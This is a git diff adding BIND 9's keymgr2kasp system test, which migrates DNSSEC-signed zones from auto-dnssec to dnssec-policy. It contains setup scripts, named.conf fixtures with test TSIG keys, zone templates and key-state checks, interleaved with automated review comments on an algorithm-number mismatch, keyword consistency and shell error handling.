$DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Set up Single-Type Signing Scheme zones with auto-dnssec maintain to +# migrate to dnssec-policy. This is a zone that has 'update-check-ksk no;' +# configured, meaning the zone is signed with a single CSK. 
+setup csk.kasp +echo "$zone" >> zones +csktimes="-P now -A now -P sync now" +CSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $csktimes $zone 2> keygen.out.$zone.1) +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +$SIGNER -S -z -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +setup csk-nosep.kasp +echo "$zone" >> zones +csktimes="-P now -A now -P sync now" +CSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $csktimes $zone 2> keygen.out.$zone.1) +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +$SIGNER -S -z -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Set up a zone with auto-dnssec maintain to migrate to dnssec-policy, but this +# time the existing keys do not match the policy. The existing keys are +# RSASHA256 keys, and will be migrated to a dnssec-policy that dictates +# ECDSAP256SHA256 keys. +setup migrate-nomatch-algnum.kasp +echo "$zone" >> zones +Tds="now-3h" # Time according to dnssec-policy that DS will be OMNIPRESENT +Tkey="now-3900s" # DNSKEY TTL + propagation delay +Tsig="now-12h" # Zone's maximum TTL + propagation delay +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone 5 "$KSK" >> "$infile" +private_type_record $zone 5 "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Set up a zone with auto-dnssec maintain to migrate to dnssec-policy, but this +# time the existing keys do not match the policy. 
The existing keys are +# 2048 bits RSASHA256 keys, and will be migrated to a dnssec-policy that +# dictates 3072 bits RSASHA256 keys. +setup migrate-nomatch-alglen.kasp +echo "$zone" >> zones +Tds="now-3h" # Time according to dnssec-policy that DS will be OMNIPRESENT +Tkey="now-3900s" # DNSKEY TTL + propagation delay +Tsig="now-12h" # Zone's maximum TTL + propagation delay +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone 5 "$KSK" >> "$infile" +private_type_record $zone 5 "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# +# Set up zones to test time metadata correctly sets state. +# + +# Key states expected to be rumoured after migration. +setup rumoured.kasp +echo "$zone" >> zones +Tds="now-2h" +Tkey="now-300s" +Tsig="now-11h" +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 + +# Key states expected to be omnipresent after migration. 
+setup omnipresent.kasp +echo "$zone" >> zones +Tds="now-3h" # Time according to dnssec-policy that DS will be OMNIPRESENT +Tkey="now-3900s" # DNSKEY TTL + propagation delay +Tsig="now-12h" # Zone's maximum TTL + propagation delay +ksktimes="-P ${Tkey} -A ${Tkey} -P sync ${Tds}" +zsktimes="-P ${Tkey} -A ${Tsig}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O full -f $zonefile $infile > signer.out.$zone.1 2>&1 diff --git a/bin/tests/system/keymgr2kasp/ns3/template.db.in b/bin/tests/system/keymgr2kasp/ns3/template.db.in new file mode 100644 index 0000000..010b05b --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/keymgr2kasp/ns4/named.conf.in b/bin/tests/system/keymgr2kasp/ns4/named.conf.in new file mode 100644 index 0000000..e478404 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns4/named.conf.in 
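Review bot: In the `migrate-nomatch-algnum.kasp` and `migrate-nomatch-alglen.kasp` sections the keys are generated with `-a RSASHA256`, yet `private_type_record` is called with algorithm number `5`, which is RSASHA1; RSASHA256 is 8, as ns4/setup.sh in this commit records with `num="8"`. The other zones pass `$DEFAULT_ALGORITHM_NUMBER` in that position, so the argument looks like the key's own algorithm number and the records appended to `$infile` presumably name the wrong algorithm (`private_type_record` is defined outside this hunk, so this needs confirming). If so, the four calls should read `private_type_record $zone 8 "$KSK" >> "$infile"` and likewise for `$ZSK`.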
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+ key-directory ".";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key "external" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "internal" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+view "ext" {
+ match-clients { key "external"; };
+
+ zone "view-rsasha256.kasp" {
+ type master;
+ file "view-rsasha256.kasp.ext.db";
+ auto-dnssec maintain;
+ inline-signing yes;
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+ };
+};
+
+view "int" {
+ match-clients { key "internal"; };
+
+ zone "view-rsasha256.kasp" {
+ type master;
+ file "view-rsasha256.kasp.int.db";
+ auto-dnssec maintain;
+ inline-signing yes;
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+ };
+};
diff --git a/bin/tests/system/keymgr2kasp/ns4/named2.conf.in b/bin/tests/system/keymgr2kasp/ns4/named2.conf.in
new file mode 100644
index 0000000..538aedc
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/ns4/named2.conf.in
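Review bot: Both views in ns4/named.conf.in declare their zone with `type master;`, while every zone in ns3/named.conf.in and ns3/named2.conf.in added by the same commit uses `type primary;`. For consistency across the keymgr2kasp fixtures I would write `type primary;` here and in the two zone blocks of ns4/named2.conf.in, unless the older keyword is kept deliberately to cover the synonym, in which case a short comment saying so would help.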
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+ key-directory ".";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+dnssec-policy "rsasha256" {
+ keys {
+ zsk key-directory lifetime P3M algorithm 8 2048;
+ ksk key-directory lifetime P1Y algorithm 8 2048;
+ };
+
+ dnskey-ttl 300;
+ publish-safety 1h;
+ retire-safety 1h;
+
+ signatures-refresh 5d;
+ signatures-validity 14d;
+ signatures-validity-dnskey 14d;
+
+ max-zone-ttl 1d;
+ zone-propagation-delay 300;
+
+ parent-ds-ttl 86400;
+ parent-propagation-delay 3h;
+};
+
+key "external" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "internal" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+view "ext" {
+ match-clients { key "external"; };
+
+ zone "view-rsasha256.kasp" {
+ type master;
+ file "view-rsasha256.kasp.ext.db";
+ inline-signing yes;
+ dnssec-policy "rsasha256";
+ };
+};
+
+view "int" {
+ match-clients { key "internal"; };
+
+ zone "view-rsasha256.kasp" {
+ type master;
+ file "view-rsasha256.kasp.int.db";
+ inline-signing yes;
+ dnssec-policy "rsasha256";
+ };
+};
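Review bot: Nothing in ns4/named2.conf.in says how it relates to ns4/named.conf.in: both open with the same `// NS4` header, yet this file replaces `auto-dnssec maintain` with `dnssec-policy "rsasha256"` in both views. A header such as `// NS4 (after reconfig): view zones migrated from auto-dnssec to dnssec-policy` would make that clear; presumably the file is swapped in on reconfig, as tests.sh does with ns3/named2.conf.in, but that step is not visible here. A comment on the zone blocks should also record that views `ext` and `int` share `key-directory "."`, so both apply the policy to the same key files.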
diff --git a/bin/tests/system/keymgr2kasp/ns4/setup.sh b/bin/tests/system/keymgr2kasp/ns4/setup.sh
new file mode 100644
index 0000000..63121a0
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/ns4/setup.sh
@@ -0,0 +1,46 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../../conf.sh
+
+echo_i "ns4/setup.sh"
+
+# Make lines shorter by storing key states in environment variables.
+H="HIDDEN"
+R="RUMOURED"
+O="OMNIPRESENT"
+U="UNRETENTIVE"
+
+zone="view-rsasha256.kasp"
+algo="RSASHA256"
+num="8"
+echo "$zone" >> zones
+
+# Set up zones in views with auto-dnssec maintain to migrate to dnssec-policy.
+# The keys for these zones are in use long enough that they should start a
+# rollover for the ZSK (P3M), but not long enough to initiate a KSK rollover (P1Y).
+ksktimes="-P -186d -A -186d -P sync -186d"
+zsktimes="-P -186d -A -186d"
+KSK=$($KEYGEN -a $algo -L 300 -b 2048 -f KSK $ksktimes $zone 2> keygen.out.$zone.1)
+ZSK=$($KEYGEN -a $algo -L 300 -b 2048 $zsktimes $zone 2> keygen.out.$zone.2)
+
+echo_i "setting up zone $zone (external)"
+view="ext"
+zonefile="${zone}.${view}.db"
+cat template.$view.db.in "${KSK}.key" "${ZSK}.key" > "$zonefile"
+
+echo_i "setting up zone $zone (internal)"
+view="int"
+zonefile="${zone}.${view}.db"
+cat template.$view.db.in "${KSK}.key" "${ZSK}.key" > "$zonefile"
diff --git a/bin/tests/system/keymgr2kasp/ns4/template.ext.db.in b/bin/tests/system/keymgr2kasp/ns4/template.ext.db.in
new file mode 100644
index 0000000..eecda2f
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/ns4/template.ext.db.in
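Review bot: The `-e` on the `#!/bin/sh -e` line of ns4/setup.sh has no effect when the script is started as `$SHELL setup.sh`, which is how keymgr2kasp/setup.sh in this commit runs it, and unlike that caller this script never calls `set -e` itself. Unless conf.sh turns errexit on (not visible here), a failing `$KEYGEN` leaves `KSK` or `ZSK` empty and the script goes on to `cat` a file named `.key`; adding `set -e` right after `. ../../conf.sh` would stop at the first failure. Separately, `H`, `R`, `O`, `U` and `num` are assigned but never read in these 46 lines and can be dropped.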
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns4
+ns4 A 10.53.0.4
+
+view TXT "external"
diff --git a/bin/tests/system/keymgr2kasp/ns4/template.int.db.in b/bin/tests/system/keymgr2kasp/ns4/template.int.db.in
new file mode 100644
index 0000000..3783d64
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/ns4/template.int.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns4
+ns4 A 10.53.0.4
+
+view TXT "internal"
diff --git a/bin/tests/system/keymgr2kasp/setup.sh b/bin/tests/system/keymgr2kasp/setup.sh
new file mode 100644
index 0000000..e43f798
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/setup.sh
@@ -0,0 +1,34 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../conf.sh
+
+set -e
+
+$SHELL clean.sh
+
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+copy_setports ns3/kasp.conf.in ns3/kasp.conf
+
+# Setup zones
+(
+ cd ns3
+ $SHELL setup.sh
+)
+(
+ cd ns4
+ $SHELL setup.sh
+)
diff --git a/bin/tests/system/keymgr2kasp/tests.sh b/bin/tests/system/keymgr2kasp/tests.sh
new file mode 100644
index 0000000..62b58a7
--- /dev/null
+++ b/bin/tests/system/keymgr2kasp/tests.sh
@@ -0,0 +1,1137 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh +# shellcheck source=kasp.sh +. ../kasp.sh + +start_time="$(TZ=UTC date +%s)" +status=0 +n=0 + +############################################################################### +# Utilities # +############################################################################### + +# Call dig with default options. +dig_with_opts() { + + if [ -n "$TSIG" ]; then + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" -y "$TSIG" "$@" + else + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" + fi +} + +# Log error and increment failure rate. +log_error() { + echo_i "error: $1" + ret=$((ret+1)) +} + +# Default next key event threshold. May be extended by wait periods. 
+next_key_event_threshold=100 + +############################################################################### +# Tests # +############################################################################### + +set_retired_removed() { + _Lkey=$2 + _Iret=$3 + + _active=$(key_get $1 ACTIVE) + set_addkeytime "${1}" "RETIRED" "${_active}" "${_Lkey}" + _retired=$(key_get $1 RETIRED) + set_addkeytime "${1}" "REMOVED" "${_retired}" "${_Iret}" +} + +rollover_predecessor_keytimes() { + _addtime=$1 + + _created=$(key_get KEY1 CREATED) + + set_addkeytime "KEY1" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "SYNCPUBLISH" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lksk" = 0 ] || set_retired_removed "KEY1" "${Lksk}" "${IretKSK}" + + _created=$(key_get KEY2 CREATED) + set_addkeytime "KEY2" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY2" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lzsk" = 0 ] || set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}" +} + +# Policy parameters. +# Lksk: unlimited +# Lzsk: unlimited +Lksk=0 +Lzsk=0 + + +################################################# +# Test state before switching to dnssec-policy. # +################################################# + +# Set expected key properties for migration tests. +# $1 $2: Algorithm number and string. +# $3 $4: KSK and ZSK size. +init_migration_keys() { + key_clear "KEY1" + key_set "KEY1" "LEGACY" "yes" + set_keyrole "KEY1" "ksk" + set_keylifetime "KEY1" "none" + set_keyalgorithm "KEY1" "$1" "$2" "$3" + set_keysigning "KEY1" "yes" + set_zonesigning "KEY1" "no" + + key_clear "KEY2" + key_set "KEY2" "LEGACY" "yes" + set_keyrole "KEY2" "zsk" + set_keylifetime "KEY2" "none" + set_keyalgorithm "KEY2" "$1" "$2" "$4" + set_keysigning "KEY2" "no" + set_zonesigning "KEY2" "yes" + + key_clear "KEY3" + key_clear "KEY4" +} + +# Set expected key states for migration tests. 
+# $1: Goal +# $2: States +init_migration_states() { + set_keystate "KEY1" "GOAL" "$1" + set_keystate "KEY1" "STATE_DNSKEY" "$2" + set_keystate "KEY1" "STATE_KRRSIG" "$2" + set_keystate "KEY1" "STATE_DS" "$2" + + set_keystate "KEY2" "GOAL" "$1" + set_keystate "KEY2" "STATE_DNSKEY" "$2" + set_keystate "KEY2" "STATE_ZRRSIG" "$2" +} + +# +# Testing a good migration. +# +set_zone "migrate.kasp" +set_policy "none" "2" "7200" +set_server "ns3" "10.53.0.3" + +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# These keys are immediately published and activated. +rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_migrate_ksk=$(key_get KEY1 ID) +_migrate_zsk=$(key_get KEY2 ID) + +# +# Testing a good migration (CSK). +# +set_zone "csk.kasp" +set_policy "none" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "yes" +set_keyrole "KEY1" "ksk" +# This key also acts as a ZSK. +key_set "KEY1" "ZSK" "yes" +set_keylifetime "KEY1" "none" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Make sure the zone is signed with legacy key. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# The key is immediately published and activated. 
+_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_migrate_csk=$(key_get KEY1 ID) + +# +# Testing a good migration (CSK, no SEP). +# +set_zone "csk-nosep.kasp" +set_policy "none" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "yes" +set_keyrole "KEY1" "zsk" +# Despite the missing SEP bit, this key also acts as a KSK. +key_set "KEY1" "KSK" "yes" +set_keylifetime "KEY1" "none" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Make sure the zone is signed with legacy key. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# The key is immediately published and activated. +_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_migrate_csk_nosep=$(key_get KEY1 ID) + +# +# Testing key states derived from key timing metadata (rumoured). +# +set_zone "rumoured.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" + +# Make sure the zone is signed with legacy keys. 
+check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_rumoured_ksk=$(key_get KEY1 ID) +_rumoured_zsk=$(key_get KEY2 ID) + +# +# Testing key states derived from key timing metadata (omnipresent). +# +set_zone "omnipresent.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "omnipresent" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify +# Remember legacy key tags. +_omnipresent_ksk=$(key_get KEY1 ID) +_omnipresent_zsk=$(key_get KEY2 ID) + +# +# Testing migration with unmatched existing keys (different algorithm). +# +set_zone "migrate-nomatch-algnum.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "omnipresent" "omnipresent" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The KSK is immediately published and activated. +# -P : now-3900s +# -P sync: now-3h +# -A : now-3900s +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +# The ZSK is immediately published and activated. +# -P: now-3900s +# -A: now-12h +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Remember legacy key tags. +_migratenomatch_algnum_ksk=$(key_get KEY1 ID) +_migratenomatch_algnum_zsk=$(key_get KEY2 ID) + +# +# Testing migration with unmatched existing keys (different length). 
+# +set_zone "migrate-nomatch-alglen.kasp" +set_policy "none" "2" "300" +set_server "ns3" "10.53.0.3" + +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "omnipresent" "omnipresent" + +# Make sure the zone is signed with legacy keys. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The KSK is immediately published and activated. +# P : now-3900s +# P sync: now-3h +# A : now-3900s +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +# - The ZSK is immediately published and activated. +# P: now-3900s +# A: now-12h +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Remember legacy key tags. +_migratenomatch_alglen_ksk=$(key_get KEY1 ID) +_migratenomatch_alglen_zsk=$(key_get KEY2 ID) + + +############# +# Reconfig. # +############# +echo_i "reconfig (migration to dnssec-policy)" +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +# Calculate time passed to correctly check for next key events. +now="$(TZ=UTC date +%s)" +time_passed=$((now-start_time)) +echo_i "${time_passed} seconds passed between start of tests and reconfig" + +# Wait until we have seen "zone_rekey done:" message for this key. 
+_wait_for_done_signing() { + _zone=$1 + + _ksk=$(key_get $2 KSK) + _zsk=$(key_get $2 ZSK) + if [ "$_ksk" = "yes" ]; then + _role="KSK" + _expect_type=EXPECT_KRRSIG + elif [ "$_zsk" = "yes" ]; then + _role="ZSK" + _expect_type=EXPECT_ZRRSIG + fi + + if [ "$(key_get ${2} $_expect_type)" = "yes" ] && [ "$(key_get $2 $_role)" = "yes" ]; then + _keyid=$(key_get $2 ID) + _keyalg=$(key_get $2 ALG_STR) + echo_i "wait for zone ${_zone} is done signing with $2 ${_zone}/${_keyalg}/${_keyid}" + grep "zone_rekey done: key ${_keyid}/${_keyalg}" "${DIR}/named.run" > /dev/null || return 1 + fi + + return 0 +} +wait_for_done_signing() { + n=$((n+1)) + echo_i "wait for zone ${ZONE} is done signing ($n)" + ret=0 + + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY1 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY2 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY3 || ret=1 + retry_quiet 30 _wait_for_done_signing ${ZONE} KEY4 || ret=1 + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + + +################################################ +# Test state after switching to dnssec-policy. # +################################################ + +# Policy parameters. +# ZSK now has lifetime of 60 days (5184000 seconds). +# The key is removed after Iret = TTLsig + Dprp + Dsgn + retire-safety. +Lzsk=5184000 +IretZSK=867900 